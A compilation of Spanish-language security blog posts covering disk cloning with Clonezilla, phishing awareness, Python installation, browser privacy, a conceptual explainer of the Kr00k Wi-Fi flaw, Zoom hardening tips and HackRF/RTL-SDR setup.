 Luego nos pregunta si deseamos cambiar la distribución del teclado, normalmente se selecciona la opción de mantener la distribución por defecto.

Ahora nos pregunta si deseamos continuar con el instalador o entrar al shell y continuar por líneas de código, seleccionamos la opción de iniciar el Clonezilla y pulsamos la tecla enter

El wizard nos preguntará el modo de clonación que vamos a realizar, en este ejemplo seleccionamos la opción device to device (de disco a disco).

En la siguiente pantalla pregunta como vamos a ejecutar el wizard, seleccionamos el modo experto para poder escoger la opción de clonado que queramos.

Acá pregunta si deseamos clonar todo el disco o solo una partición, seleccionamos clonar el disco completo y pulsamos enter.

En esta pantalla nos muestra todos los dispositivos de almacenamiento conectados al equipo, seleccionamos el que contiene la información que se va a clonar y pulsamos enter. En este paso y el siguiente se debe tener especial atención al seleccionar las unidades de almacenamiento ya que si se selecciona la unidad equivocada se pueden perder los datos.

En este paso seleccionamos la unidad de almacenamiento en la que se va a clonar la información. De nuevo se debe observar muy bien que se seleccione la unidad correcta ya que la unidad que se seleccione va a ser formateada y perderá la información que tuviese almacenada, en este paso ya no se observa la unidad fuente ya que no podrá ser clon de sí misma. No está de más recordar que la unidad clon debe ser de igual o mayor capacidad de almacenamiento que la unidad fuente.

En el listado de opciones que se muestra a continuación, las primeras cinco vienen marcadas por defecto, así las podemos dejar; adicionalmente, vamos a marcar la casilla de la opción -v para ver como va avanzando el proceso de clonación. Para marcar o desmarcar una opción del listado debemos ir hasta esta utilizando las teclas flecha arriba y flecha abajo y pulsar la barra espaciadora cuando estemos en la opción deseada, luego pulsamos la tecla enter para continuar el wizard.

A continuación seleccionamos si deseamos comprobar y reparar el sistema fuente antes de la clonación. En este caso omitiremos la comprobación y reparación ya que puede suceder que el software se equivoque y realice cambios que puedan afectar la configuración del sistema.

Ahora nos pregunta si deseamos cambiar el particionamiento que está definido en la unidad de origen, lo recomendable ya que es una clonación, es dejar el particionamiento tal cual está en la unidad de origen.

Luego le indicamos al wizard sí queremos que cuando finalice el proceso de clonado se apague el equipo, se reinicie o que nos pregunte una vez finalizado el proceso, la opción de preguntar al final del proceso no es muy recomendable en la clonación de discos duros de mucho almacenamiento, ya que el proceso puede demorar un poco en terminar. Para el ejemplo seleccionaremos la opción de reiniciar el equipo ya que vamos a seguir trabajando en él.

Acá nos pide que pulsemos la tecla enter para iniciar el proceso de clonado.

 Luego nos avisara dos veces que los datos que existan en la unidad destino se van a eliminar y nos preguntará si estamos seguros de continuar, si estamos seguros, como en este caso, pulsamos la tecla "y" seguida de la tecla enter. Luego nos pregunta si queremos clonar la configuración de arranque que tiene la unidad de origen, pulsamos nuevamente la tecla "y" seguida de la tecla enter.

 Al instante aparece en pantalla una ventana con información de las unidades origen y destino y el avance del proceso de clonado. El proceso de clonado con Clonezilla aunque depende del tamaño de almacenamiento del disco de origen, no es muy demorado, puede clonar un disco de un Terabyte en hora y media aproximadamente.

Al finalizar la clonación, podemos ver un resumen del tiempo que tardó procesando los datos y la confirmación de que el proceso se realizó con éxito.


Finalmente, el equipo se reiniciará o apagará, según se allá configurado.


Algunas recomendaciones


  • Antes de iniciar la clonación de discos recuerda identificar cual es el disco de origen y cual es el de destino, no vaya ser que pierdas datos importantes.
  • Es recomendable abrir el equipo en el que se encuentra el disco de origen para identificar en donde está conectado.
  • Para agilizar la clonación se recomienda abrir el equipo y conectar ambos discos duros, ya sea por un bus sata u otro, ya que se ha observado que el proceso va más rápido de esta forma que conectando las unidades por usb.

NUESTRA GIRA DE FEBRERO A ABRIL 2020

$
0
0
Después de unas merecidas vacaciones, desde marzo regresamos con lo mejor de TheHackingDay Proyect.


En este post les contaremos acerca de la gira que tendremos entre Febrero y abril en los países de Colombia, Bolivia y Ecuador, en donde estaremos con nuestra certificación internacional de Hacking Ético THD-EPC (Ethical Pentester Certified), ademas de talleres especializados en Firewall Open-Source Empresarial, Descubriendo Ataques Mediante Análisis de Tráfico , Metasploit en Profundidad y Cursos especiales de Seguridad Informática. 




Comenzaremos en Colombia con la organización Basc, que en su capitulo en Santa Marta llevaremos un curso de Seguridad Informática enfocada a las empresas de la región,  este se realizará el 26 de Febrero, pueden obtener más información en el correo:   comunicaciones.santamarta@wbasco.org

Luego seguiremos con el 5to BootCamp de Seguridad Informática organizado por Confa Educación, el cual se desarrollará del 9 al 14 de Marzo. Allí dictaremos nuestra certificación internacional de Hacking Ético THD-EPC (Ethical Pentester Certified).



Saltaremos a Bolivia a la Universidad Autónoma Gabriel René Moreno, en donde estaremos desde el 16 de Marzo hasta el 04 de Abril. Allí además de nuestra certificación internacional de Hacking Ético THD-EPC (Ethical Pentester Certified), estaremos dictando algunos de nuestros cursos especializados.

Del 18 al 20 de Marzo dictaremos nuestro curso "Descubriendo Ataques Mediante el Análisis de Tráfico", del 25 al 27 de Marzo enseñaremos el curso "Firewall Open-Source Empresarial" y del 01 al 03 de Abril hablaremos del conjunto de programas (exploits) que integran la Suite de MetasSloit en el curso "MetaSploit en Profundidad".



Nuestra gira finalizará en Ecuador, en donde estaremos del 20 de Abril al 02 de Mayo en la Universidad Católica de Cuenca, allí nuevamente dictaremos nuestra certificación internacional de Hacking Ético THD-EPC (Ethical Pentester Certified).



Esperamos encontrarnos con ustedes en alguno de estos eventos para que compartamos conocimiento.

TEST DE GOOGLE PARA MEDIR CONOCIMIENTOS SOBRE PHISHING

$
0
0
El Phishing es una de las amenazas informáticas más usuales y que mayor efectividad tiene, a tal grado que la RMS en su informe "La transformación digital y su impacto en la ciberseguridad" habla de que el 46% de los ataques que tuvieron éxito en el 2019 fueron realizados con Phishing a los empleados de las empresas atacadas.

Los ataques de Phishing han ido evolucionando con el tiempo llegando incluso a utilizar los servicios de Google para lograr que sus victimas caigan al seguir los enlaces o abrir las imágenes creyendo que son seguros. Según el informe "Spam y Phishing en el segundo trimestre de 2019" de Kampersky los ciberdelincuentes utilizan servicios de Google como el almacenamiento en la nube para alojar documentos de texto y enlaces a productos publicitario o páginas Phishing. El informe ademas habla de ataques poco convencionales a través de servicios como Google Calendar, Google Photos o incluso Google Forms.






Por esta razón y lo difícil que puede ser identificar los ataques de Phishing que llegan diariamente a nuestros correos electrónicos Google ha lanzado el test "Puedes detectar cuando te están engañando".



El test consiste en que Google muestra la bandeja de entrada de un usuario y allí va mostrando varios ejemplos de correos, en los cuales le pide al usuario que seleccione si ese correo es legitimo o es un spam. Aunque algunos ejemplos son fácil de identificar, otros pueden parecer auténticos, pero tranquilos que al elegir la respuesta Google brinda una corta explicación de porque el correo es falso y da algunos tips para identificarlo.



Si consideras que no eres muy ducho en la identificación de correos maliciosos te recomendamos que realices el test y si por el contrario, consideras que eres experto en este tema, también te recomendamos que lo realices. No está de más reforzar el conocimiento en este tema.

Fuente:  Genbeta

@jmvargas19
@TheHackingDay

COMO INSTALAR PYTHON EN WINDOWS 10

$
0
0
Python es un lenguaje de programación multiparadigma y débilmente tipado, lo que quiere decir que el desarrollador que lo utilice no esta obligado a seguir un estilo de programación y que al declarar una variable no tiene que especificar su tipo, además, las variables en Python son dinamicas, lo que permite que luego de declararlas se pueda cambiar el tipo, por ejemplo podríamos declarar la variable x con un valor tipo numérico x = 1 y posteriormente asignarle a x un valor tipo texto x = "hola".

Las aplicaciones desarrolladas en Python pueden ser ejecutadas en cualquier sistema operativo, sin embargo en el caso de Windows hay ocasiones en las que no es posible ejecutar scripts por no tener instalado un entorno de programación, así que vamos a ver como es el proceso de instalación de Python en Windows.




Para iniciar la instalación vamos a la página de Python y damos clic en el enlace a descargas, allí nos muestra las opciones de descarga según el sistema operativo en el que se va a realizar la instalación, el sitio web detecta automáticamente el sistema operativo desde el que se accede y por defecto resalta la opción compatible con dicho sistema, en nuestro caso descargamos la última versión para Windows.



Al ejecutar el Wizard de instalación la primer ventana nos pide que seleccionemos la forma en que deseamos instalar Python, sí se selecciona la opción "Instalación personalizada" el Wizard permite determinar los componentes de Python que se desean instalar y la carpeta en la que se va a guardar, acá seleccionamos "instalar ahora" ya que vamos a instalar todos los componentes y no queremos cambiar la ruta de instalación por defecto. Ademas, marcamos las casillas de verificación "Instalar para todos los usuarios" y "Adicionar Python al Path" para poder ejecutar Python rápidamente desde la consola.



Al finalizar la instalación el Wizard muestra una ventana en la cual podemos encontrar enlaces a documentación y un tutorial de Python en línea, para terminar la instalación vamos a permitir que Python elimine el limite máximo de ruta predefinido en el sistema y damos clic en "Close".



Finalizada la instalación vamos a la consola de Windows, escribimos "python" y si todo salió bien, entraremos a la consola de Python y podremos ver la versión que se encuentra instalada.



Esperamos que este tutorial les sea útil llegado el caso que requieran instalar Python en su equipo con Windows 10.


@jmvargas19
@TheHackingDay

MICROSOFT LANZA SISTEMA OPERATIVO BASADO EN LINUX

$
0
0
Uno de los términos más sonados en la actualidad y que con el paso del tiempo va adquiriendo más fuerza es IoT (Internet de las cosas), esta tecnología futurista es una realidad, pues ya encontramos en el mercado una gran variedad de dispositivos personales y electrodomésticos con conexión a internet e interconectados entre si.

Dado a la gran acogida del IoT (se estima que en el año 2025 haya más de 41 mil millones de dispositivos y electrodomésticos conectados a internet) un gigante de la tecnología como Microsoft no se podía quedar por fuera, así que hace poco lanzó su conjunto de soluciones para IoT, Azure Sphere.





Sobre Azure Sphere se conoció en el 2018 cuando Microsoft presentó la versión preliminar de su proyecto destinado a los dispositivos del ecosistema IoT, ahora este proyecto es una realidad. Azure Sphere está compuesto por tres pilares: Sistema Operativo (Azure Sphere OS), Seguridad basada en la Nube (Azure Sphere Security Service) y un microcontrolador (MediaTek MT3620).

Azure Sphere OS es un sistema operativo con un kernel Linux, si, así es, Microsoft usó a Linux como base para desarrollar el Azure Sphere OS. Resulta que por la naturaleza del IoT Microsoft necesitaba un sistema operativo flexible que se integrara fácilmente a la gran variedad de hardware que puede soportar IoT, lo que supera la capacidad de adaptación de Windows y en cambio encaja a la perfección con la versatilidad de Linux.



Azure Sphere Security Service es la solución que Microsoft plantea para enfrentar los ataques realizados por ciberdelincuentes, dado que se estima que el IoT sea fuertemente atacado por la cantidad de datos que los dispositivos recopilan y almacenan en la nube, lo cual según Microsoft, su servicio de seguridad en la nube evitará protegiendo los datos y garantizando una comunicación segura entre dispositivos IoT, utilizando sistemas de autenticación en las conexiones y garantizando constantes actualizaciones del software.



El MediaTek MT3620 es un microprocesador basado en arquitectura ARM, con un controlador que se conecta a la red wifi y un procesador diseñado para ejecutar el Azure Sphere OS. Además, esta CMU (Unidad de Microcontrolador) tendrá actualizaciones periódicas del sistema operativo e incluye un subsistema de seguridad que Microsoft bautizó como Pluton, el cual, al igual que el subsistema de wifi, se ejecuta independiente de las aplicaciones del usuario final.




Fuente: WWWATHSNEW

@jmvargas19
@TheHackingDay

NAVEGUE SEGURO CON BRAVE

$
0
0
Brave es un navegador web de código abierto basado en chromium, tiene la capacidad de bloquear anuncios y rastreadores en línea. Además, sus servidores no ven ni almacenan datos de navegación, estos datos quedan almacenados en cada equipo en forma privada por lo cual no son compartidos a terceros.






El estudio "Privacidad de los navegadores web ¿Qué dicen los navegadores cuando llaman a casa?" publicado por la escuela de informática y estadística del Trinity College Dublin en Irlanda, mide las conexiones realizadas por los seis principales navegadores del mercado (Google Chrome, Mozilla Firefox, Apple Safari, Microsoft Edge, Brave Browser y Yandex Browser) con sus respectivos servidores back-end durante su funcionamiento normal.




El estudio fue enfocado en: la medición del seguimiento web y los métodos para la identificación y bloqueo de rastreadores, para ello los investigadores se fijaron en los datos compartidos durante cinco procesos. Al iniciar el navegador por primera vez después de su instalación, al cerrar y reiniciar el navegador, al pegar una URL en la barra de búsqueda, al escribir en la barra de búsqueda y cuando el usuario no está ejecutando el navegador.

Para concluir el estudio los investigadores ubicaron los navegadores en tres grupos según la perspectiva de seguridad.

En el grupo más privado ubican a Brave ya que según el estudio "es por lejos el más privado de los navegadores estudiados" teniendo en cuenta que no se encontro ningún uso de identificadores que permitan algún tipo de seguimiento de la dirección IP del usuario ni se comparten datos de las páginas web visitadas a los servidores de back-end.

En el segundo grupo fueron ubicados Chrome, Firefox y Safari, ya que encontraron que estos envían datos de las páginas visitadas a sus servidores de back-end a través de la función autocompletar búsqueda. Según el estudio, estos tres navegadores se pueden configurar para que sean más seguros, pero para ello el usuario debe tener ciertos conocimientos avanzados.

En el grupo menos privado quedaron Edge y Yandex, ya que adicional a enviar datos de las páginas visitadas, envían información relacionada con el hardware del dispositivo en el que se encuentran instalados, también permiten la vinculación de otras aplicaciones que se ejecutan en el mismo dispositivo. Además, estos dos navegadores no permiten al usuario modificar su configuración para no compartir información.



@jmvargas19
@TheHackingDay



KR00K, UNA VULNERABILIDAD GRAVE EN EL INTERIOR DEL CIFRADO DE WI-FI

$
0
0




¿Qué es Kr00k?

Hace unos días en la conferencia de seguridad RSA 2020, los investigadores de seguridad de la compañía de antivirus ESET presentaron detalles sobre una nueva vulnerabilidad que afecta las comunicaciones WiFi.

Los investigadores, descubrieron una vulnerabilidad previamente desconocida en los chips de Wi-Fi y la llamaron Kr00k. Esta es una falla grave, asignada CVE-2019-15126, hace que los dispositivos vulnerables usen una clave de cifrado all-zero para cifrar parte de la comunicación del usuario. En un ataque exitoso, esta vulnerabilidad le permite a un adversario descifrar algunos paquetes de red inalámbrica transmitidos por un dispositivo vulnerable.


¿A quién afecta esta vulnerabilidad?

Kr00k afecta a dispositivos con chips Wi-Fi de Broadcom y Cypress que aún no se han parcheado (Parches de seguridad). Estos son los chips Wi-Fi más comunes que se usan en dispositivos con capacidad Wi-Fi contemporánea, como es un Smartphone, Tablet, Laptop y los dispositivos IoT. No solo los dispositivos cliente, sino también access point Wi-Fi y routers con chips Broadcom se vieron afectados por la vulnerabilidad, lo que hace que muchos entornos con dispositivos cliente no afectados o ya parcheados sean vulnerables de todos modos.




LA VULNERABILIDAD DE Kr00k

Nos centraremos en WPA2, ya que es el estándar más utilizado en las redes Wi-Fi contemporáneas. Cada vez que un dispositivo cliente establece una conexión con un access point, la etapa inicial se denomina asociación, lo contrario es una disociación y la combinación de los dos es una re-asociación: son los más relevantes. Las disociaciones y re-asociaciones ocurren por varias razones: por ejemplo, cuando un cliente deambula de un access point Wi-Fi a otro, debido a la interferencia de la señal, o simplemente cuando un usuario apaga el Wi-Fi.

Con WPA2, la comunicación segura se establece mediante el protocolo de enlace de 4 vías (Para más información revisar el artículo: Seguridad en redes Wi-Fi). Asegura la mutua autenticación del cliente y el access point (por ejemplo, al confirmar que ambos conocen el clave pre-compartida (PSK), también conocida como contraseña de acceso a Wi-Fi). Durante el '4-way handshake' (apretón de manos de 4 vías), el cliente y el access point también construye e instala claves criptográficas para la confidencialidad e integridad de los datos. La clave que se negocia es la PTK (clave transitoria por pares), que se divide en diferentes claves. Sirviendo para diferentes propósitos. El que es más relevante en este caso, Kr00k es el de 128 bits TK (clave temporal), que se utiliza para cifrar tramas de datos de unidifusión transmitidas durante la sesión del cliente AP. Utilizaremos los términos TK y "clave de sesión".

En la siguiente imagen se observa de forma gráfica como funciona la disociación.


La imagen anterior proporciona una descripción esquemática del error a nivel de chip. Si bien no se tiene visibilidad en el funcionamiento interno de los chips afectados, se cree que el esquema (basado en la especificación del chip CYW4356) captura la causa y la idea básica de la vulnerabilidad.

Ahora veamos una imagen que explica lo que continúa después de la disociación.


Kr00k se manifiesta después de una disociación. Una vez que la sesión WLAN de una estación se disocia (1), la clave de sesión (TK) almacenada en el chip de Wi-Fi del controlador de interfaz de red inalámbrica (WNIC) se borra en memoria puesto a cero all-zero. Este es el comportamiento esperado, ya que se supone que no se transmitirán más datos.

Después de la disociación, descubrimos que todas las tramas de datos que quedaron en el búfer TX (transmisión) del chip eran transmitidas después de ser encriptadas con esta clave de all-zero.

Como resultado, el atacante puede capturar más paquetes de red que contienen datos potencialmente confidenciales.


Gráfica de una Captura de Paquetes



CONCLUSIÓN

Kr00k - CVE-2019-15126: es una vulnerabilidad que afectó a miles de millones de dispositivos, lo que podría causar la fuga de datos confidenciales y abrir un nuevo vector de ataque para blackhats.

Luego del descubrimiento de la vulnerabilidad, la compañía ESET divulgó responsablemente al chip afectado, fabricantes Broadcom y Cypress (inicialmente a Amazon).

Si bien la fuente del error radica en los chips de Wi-Fi, afortunadamente, puede mitigarse a través de software o actualizaciones de firmware según algunas publicaciones de proveedores y nuestras propias pruebas (no exhaustivas), los dispositivos deben tener parches para la vulnerabilidad en el momento de la publicación. Dependiendo del tipo de dispositivo, esto puede que solo signifique asegurarse de que estén instaladas las últimas actualizaciones de SO o software (dispositivos Android, Apple y Windows; algunos dispositivos IoT), pero pueden requerir una actualización de firmware (access point, enrutadores y algunos dispositivos IoT).

Por lo tanto, los usuarios y las organizaciones deben actualizar los dispositivos con chips Broadcom o Cypress a la última versión.


¿Cuál es la diferencia entre Krack Attack y Kr00k?

Mientras KRACK afectaba al propio protocolo, Kr00k es una vulnerabilidad más específica y donde pese a afectar a millones de dispositivos, su solución es más sencilla. Estas son las diferencias entre KRACK y Kr00k, según explican los propios investigadores:


KRACK

  • Es un acrónimo, una serie de ataques - exploits.
  • La idea básica de KRACK es que el número del paquete se reutiliza para conseguir la secuencia clave.
  • Se activa durante el '4-way handshake', el proceso de negociación del protocolo WPA2.
  • Afecta a la mayoría de los dispositivos con Wi-Fi, ya que explota fallas de implementación en el protocolo WPA2.

Kr00k
  • Kr00k, por otro lado, es una vulnerabilidad.
  • La idea principal de Kr00k es que los datos están cifrados con una clave temporal.
  • Aunque previamente se efectúa el protocolo de '4-way handshake' (apretón de manos de 4 vías). Se activa después de una disociación.
  • Afecta los chips de Wi-Fi más extendidos (Broadcom y Cypress).

La vulnerabilidad Kr00k afecta a aquellas conexiones WiFi que utilizan los protocolos de seguridad WPA2-Personal o WPA2-Enterprise WiFi, con encriptación AES-CCMP. Aquellos dispositivos con chipset Broadcom o Cypress que utilicen el nuevo protocolo de autenticación WPA3 WiFi podrán protegerse. Sin embargo, hemos visto que este último tampoco está exento de sus propios problemas.

Nuevamente se recomienda leer el artículo: Seguridad en redes Wi-Fi.

Notas Aportadas por @jcaitf

Recientemente se publico una Prueba de Concepto (PoC)  desarrollada por un grupo de investigadores de seguridad de HexWay. Muestran cómo explotar esta vulnerabilidad que fue descubierta en el pasado mes de febrero por investigadores de Eset.

En esta prueba de concepto han utilizado un script de Python llamado r00kie-kr00kie. Este script fuerza al dispositivo a que se desvincule de una red y todos los paquetes de datos que quedan en el chip del Wi-Fi del dispositivo se cifran con todos los ceros y posteriormente se vacían y se leen. 

Esta acción permite repetirla en varias ocasiones y así poder leer información de la víctima de los datos que puedan estar sin cifrar. 


Autor: David Fernando Suárez Zambrana, - Certificado Ethical Pentester Certified

SEGURIDAD EN ZOOM

$
0
0
Zoom es una de las plataformas de reuniones virtuales que más popularidad ha adquirido en estos días de coronavirus, pero también ha desatado muchas dudas y alertas con respecto a su seguridad.

Dado los reportes que hemos leído en estos días, en los que se demuestra las falencias de esta aplicación, hemos decidido realizar una búsqueda de opciones para mejor la seguridad de esta aplicación desde el ambiente de usuario y nos encontramos un par de artículos bastante interesantes sobre la manera en que se puede configurar Zoom para que su uso sea más seguro.



Una de las publicaciones que más nos llamó la atención es un artículo publicado en el blog de zoom llamado Las mejores prácticas para asegurar su aula virtual y la otra es el artículo Endurezca su configuración de zoom para proteger su privacidad y evitar trolls de la Electronic Frontier Fundation.

A continuación, haremos un resumen de los tips que hemos encontrado en estos artículos con su respectivo paso a paso, tenga en cuenta que los cambios en la configuración que se muestran en este artículo no son obligatorios, solo realice los que considere que aplican según el uso que le de a este software.

Hemos separado la configuración de Zoom en tres secciones: en su cuenta, al programar una reunión, durante la reunión.

En su cuenta.

  • Permita que solo los participantes que hayan iniciado sesión en Zoom ingresen a la reunión: Para ello en su cuenta de zoom vaya a Configuración => Programar reunión => Active la opción “Solo los usuarios autenticados pueden unirse a reuniones desde el cliente web”.
    


  • Configure la solicitud de contraseña cuando se programe una reunión: Vaya a Configuración => Programar reunión => Active la opción “Solicitar contraseña al programar nuevas reuniones”.
    

  • Configure la solicitud de contraseña para reuniones instantáneas: Vaya a Configuración => Programar reunión => Active la opción “Requerir una contraseña para las reuniones instantáneas”.
    

  • Deshabilite la inclusión de contraseña en el enlace de invitación a la reunión: Vaya a Configuración => Programar reunión => Desactive la opción “Incluir la contraseña en el enlace de la reunión para permitir el acceso con un solo clic”.
    

  • Silencie a los participantes cuando ingresen a la reunión: Vaya a Configuración => Programar reunión => Active la opción “Silenciar a los participantes una vez entren”.
    

  • Desactive el chat privado entre los asistentes: Para ello vaya a Configuración => En la reunión (Básico) => Busque la opción “Chat privado” y desactívela.
    

  • Desactive el guardado automático de los chats: Vaya a Configuración => En la reunión (Básico) => Busque la opción “Guardar automáticamente chats” y desactívela.
    

  • Establezca el uso compartido de pantalla solo para el anfitrión: Vaya a Configuración => En la reunión (Básico) => Busque la opción “Uso compartido de la pantalla” y en “¿Quién puede compartir?” marque la opción “Solo el anfitrión”.
    

  • Active la sala de espera para los participantes (al activar esta opción, se desactiva automáticamente la opción que permite a los participantes unirse a la reunión antes que el anfitrión) => Vaya a Configuración => En la reunión (Avanzada) => Busque la opción “Sala de espera” y actívela.
    



Al programar una reunión

  • Genere una ID de reunión aleatoria
    

  • Requiera la contraseña de reunión
    

  • Apague el vídeo para anfitrión y participantes
    

  • Habilite la sala de espera y silenciar a los participantes al entrar
    



En la reunión

  • Bloquee la reunión para que no haya nuevos ingresos: Para esto de clic en el icono “Participantes” ubicado en la parte inferior de la pantalla => En la ventana que se abre pulse el botón con tres puntos seguidos => Seleccione la opción “Bloquear reunión”.
    

  • Elimine participantes que no deberían estar en la reunión: De clic en el icono “Participantes” => Busque el participante que desea eliminar de la reunión y sobre este de clic en el botón “Más” => Seleccione la opción “Retirar”.
    



Esperamos que estos tips ayuden a mejorar su experiencia al utilizar zoom.


PRIMEROS PASOS - HACKRF & RTL/SDR

$
0
0
Hemos venido publicando unas serie de artículos que tiene que ver con las capturas de Radio Frecuencias,  a continuación recordamos sus enlaces:

  1. HACKING RADIOCOMUNICACIONES CON DISPOSITIVO DE 8 DOLARES
  2. INTERCEPTANDO TRÁFICO DE MÓVILES CON UN IMSI CATCHER LOWCOST
  3. YARD STICK ONE - PRIMEROS PASOS

A pronto de liberar artículos que tratan sobre interceptar y la reproducir frecuencias, vemos la necesidad de dar los primeros pasos aquellas personas que tienen un dispositivo como un HackRF o una placa RTL-SDR RTL2832U DVB-T,  como se muestran en la siguiente imagen:



Antes de las explicaciones, quiero agradecer de corazón al Ing Andrés Felipe González (@TrainerMikrotik) que ademas de ser experto en la marca Mikrotik es un radio aficionado experto en el tema de captura y de-codificación de señales de radio tanto análogas como digitales y que de forma desinteresada ha compartido su conocimiento.




La explicaciones aquí presentadas solo es para la puesta en marcha (Captura de Señales) de los dispositivos tanto en Windows, Linux y Android, el tema de de-codificación hará parte de futuros artículos.

Windows 10

Para este sistema es necesario descargar dos software necesarios para la puesta en marcha, el primero de ellos se llama ZADIG (https://zadig.akeo.ie/) el cual instala los drivers genéricos necesarios para poder interactuar con los dispositivos de tipo USB como es el caso RLT-SDR.

El segundo de ellos, se trata del software que permite el análisis del espectro radioeléctrico, para Windows el mas recomendado es el SDRconsole (https://www.sdr-radio.com/download), puedes descargar basado en la arquitectura de tu maquina 32 o 64 bits.

Una vez descargue el software antes mencionado, siga las siguientes indicaciones:

Inserte su dispositivo USB RTL-SDR o HackRF en su equipo Windows 10 y permita que este reconozca automáticamente los drivers.

Para el caso de los dispositivos que solo reciben señal, caso USB RTL-SDR ejecute el programa ZADIG como administrador y siga los siguientes pasos:  

1. Ubíquese en la pestaña de "Options" y marque la casilla de "List All Devices"


2. Seleccione el RTL que reconoce el sistema y presiona el botón de "Replace Driver"


Puede suceder de que aparezca RTL-SDR como interfaces Buk-In tanto como la interface 0 o 1, en cuyo caso se reemplaza los drivers por cada una de las dos interfaces.


3. Una vez termine de reemplazar los Driver, te saldrá un mensaje de que el procesos fue exitoso:

Terminado el proceso, se recomienda re iniciar su maquina de Windows, asegúrese de que ninguno de los dispositivos este conectado.


Puesta en Marcha

Para este punto ya puedes instalar el software SDRconsole, que es una instalación normal como  cualquier programa bajo Windows, el mismo instalador se encarga de adicionar los paquetes de dependencia necesarios como son diferentes versiones de Microsoft Visual C++, una vez instalado te creara un icono en el escritorio.

Antes de abrir la aplicación asegúrese de conectar el dispositivo RTL-SDR o HackRF.  

Cuando abra la aplicación por primera vez, automáticamente te abrirá una ventana donde te solicitara las definiciones del dispositivo SDR a utilizar.

Aquí presionamos el botón de "Definitions"


Luego aparece otra ventana, con la definiciones de radio


Presionamos el botón "Search" y elegimos el dispositivo a utilizar, para el caso del RTL-SDR el dispositivo es el "RTL Dongle" para el caso del dispositivo HackRF lo encontrara tal cual.



Una vez lo seleccione, saldrá una ventana indicando que encontró el dispositivo a lo cual presiona el botón "Add"    



Verifica que la casilla de "Enabled" este habilitada y luego presiona el botón "Save"


Si deseas agregar mas dispositivos recomendamos re iniciar el software SDRconsole y agregar las definiciones que quieras, solo ten en cuenta que debes tener el dispositivo conectado.

Ahora esta listo para seleccionar el dispositivo que utilizara con el software, sin embargo es importante que conozca las capacidades de ancho de banda que maneja cada uno de ellos ya que el software le solicitara esta opción.  Para el caso de las RTL-SDR, el ancho de banda máximo es de 2.048 Mhz, mientras que para el HackRF es de 20 Mhz. 

Esto lo debe especificar en el campo de "Bandwidth", una vez seleccione el dispositivo a usar.


Ahora solo basta con presionar el botón "Start", para iniciar el reconocimiento de las frecuencias, recomiendo al lector ensayar primero con las Emisoras AM o FM las cuales puede encontrar entre los 88 y 108 Mhz


Para el manejo del software SDRconsole, recomendamos buscar varios vídeos tutoriales en Internet, sin embargo; tenga en cuenta que no es el único que puede utilizar en Windows y continuación menciono otros que pueden servir a la causa:


SDR# SDR Sharp  :  https://airspy.com/download/ 


LINUX

Para Linux la puesta en marcha es mas sencilla que lo visto en Windows, asumiremos para la manipulación de estos dispositivos el uso de la distribución de Linux  Kali Linux en su ultima versión y con las actualizaciones al día.

Por defecto Kali, debe reconocer los dispositivos cuando los conecta al puerto USB, muestro las dos imágenes tanto para el HackRF como para el RTL-SDR



Lo primero es instalar el software necesario que permite el uso de su HackRF o del RTL-SDR, para el caso de la HackRF una vez lo inserta en Kali y es reconocido por el sistema, debes instalar el paquete "hackrf", tal como se ve en la imagen y posteriormente puede ejecutar el comando "hackrf_info" para conocer información del dispositivo.



Para el caso del RTL-SDR, solo basta con instalar el software del driver llamado "rtl-sdr"


y si desea hacer un pequeño test a la interface.


Puesta en Marcha

Como segunda medida al ya tener los dispositivos configurados en nuestro Kali Linux, solo queda por instalar el software necesario que permita el estudio del espacio radio eléctrico,  existen varios que puedes utilizar; entre los que se encuentran:  GNURADIO y GQRX.  Este ultimo su manejo es similar que vimos previamente en Windows.

Solo requiere instalar el paquete "gqrx-sdr", este a su vez instalara las dependencias del caso lo que puede tardar algo de tiempo.


Una vez termina, recomendamos re iniciar su maquina de Kali Linux, luego inserta el dispositivo bien sea la HackRF o RTL-SDR y desde la consola de Kali ejecutar el comando "gqrx"

Al igual que vimos en el SDRconsole, el GQRX nos preguntara por el tipo de dispositivo, que en este caso solo es elegirlo y presionar el botón de "OK"


Luego se presiona el botón PLAY que se encuentra en la barra superior al lado izquierdo, para empezar la captura.


De igual forma encontraras varios vídeos tutoriales para el manejo GQRX.

ANDROID


Aunque no entraremos en detalles es conveniente para el lector saber que desde cualquier terminal móvil con OS Android, se puede analizar y decodificar algunas bandas y canales del espectro radio eléctrico.

Dependiendo de la marca y versión de su SmartPhone, se requiere de un cable adicional como es un adaptador micro-USB/Tipo C a USB-A Hembra (Conocido como el cable OTG), el cual te sirve para conectar tu dispositivo USB RTL-SDR o HackRF 

Para el caso de los RTL-SDR, se debe instalar un paquete de la Play Store llamado SDR DRIVER, que contiene los controladores que permite que la manipulación del dispositivo.

Para el caso del HACKRF, los controladores y software para Android y los pasos de instalación se encuentran en el siguiente enlace: https://github.com/demantz/hackrf_android .  (Para este tema dedicaremos un articulo aparte). 

Una vez configure los controladores, puedes descargar el software RF Analyzer de la Play de Google y analizar el espectro.


ACTUALIZAR EL FIRMWARE DEL HACKRF

Es importe que se conozca el procedimiento para la actualización del Firmware del HACKRF, tenga en cuenta que al igual que explicamos con el articulo de los primeros pasos en YARD STICK ONE, no recomendamos el uso de Kali Linux para esta operación.

Podemos utilizar Ubuntu y descargar el software necesario para ello, pero también podemos usar una distribución de Linux exclusiva para el trabajo con señales de radio, se trata de SkyWave el cual puede descargar la ISO del sitio oficial:  https://skywavelinux.com/.

Personalmente lo que hice fue crear una maquina virtual con 2 Gigas en Ram y 30 Gigas en Disco Duro y al arrancar esta maquina desde la ISO descargada, presenta en su escritorio un icono que permite la instalación física sobre el ambiente virtual preparado.  Recomiendo hacer esta operación ya que el final con los comandos desde consola de "apt-get update" y "apt-upgrade", podrás tener una tool totalmente actualizada.


Inserte su HackRF y verifique que la maquina virtual reconoció el dispositivo, luego puede verificar la versión del Firmware con el comando "hackrf_info".


Como puede notar en la imagen anterior el Firmware del dispositivo es el 2015.07.2, buscando en la pagina oficial del proyecto: (https://github.com/mossmann/hackrf/releases/)  vemos que la ultima versión al momento que se escribe este articulo es la 2018.01.1, por tanto es necesario su actualización.  Para ello, ejecutaremos los siguientes pasos:

1. Desde la consola de comandos como administrador descargue y descomprima el archivo ZIP que contiene la ultima versión del Firmware para la HackRF, para ellos aplique los siguientes comandos:






2. Ingrese al directorio creado con el comando "cd hackrf-2018.01.1"




3. Con la HackRF conectada y reconocida por el sistema, ejecute el siguiente comando, para actualizar el Firmware:


Cuando termina notara que varios leds de la HackRF parpadean en secuencia, presiona el botón RESET del dispositivo. una vez cargue nuevamente y por seguridad desconecte y conecte nuevamente el dispositivo a través del puerto USB.

